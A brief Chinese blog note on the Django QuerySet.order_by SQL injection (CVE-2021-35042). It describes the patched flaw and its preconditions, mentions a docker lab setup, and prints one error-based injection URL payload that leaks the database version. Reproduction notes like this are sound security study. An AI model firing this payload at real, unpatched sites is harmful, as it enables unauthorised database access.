漏洞描述
Django 于 2021年7月1日发布了一个安全更新,修复了函数QuerySet.order_by中的 SQL 注入漏洞。
参考链接:
该漏洞需要开发人员使用order_by功能。此外,还可以控制查询集的输入。
漏洞环境及利用
搭建docker环境
payload
/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23
Django QuerySet.order_by SQL注入漏洞(CVE-2021-35042)
blackK_YC2023-11-26 19:09
相关推荐
晓py2 分钟前
InnoDB 事务日志机制全流程详解|从 SQL 到崩溃恢复的完整旅程linuxxx11020 分钟前
django中request.GET.urlencode的使用星空的资源小屋2 小时前
Text Grab,一款OCR 截图文字识别工具言之。12 小时前
【Django】基础1(万字讲解)姚远Oracle ACE13 小时前
Oracle AWR案例分析:精准定位SQL执行计划切换的时间点yzx99101314 小时前
基于Django的智慧园区管理系统开发全解析敲代码的嘎仔15 小时前
JavaWeb零基础学习Day6——JDBC哥哥还在IT中16 小时前
让数据库更智能-大模型如何优化我们的SQL查询Hello.Reader19 小时前
Flink Table API & SQL 概念、常用 API 与工程落地少废话h2 天前
Spark 中数据读取方式详解:SparkSQL(DataFrame)与 SparkCore(RDD)方法对比及实践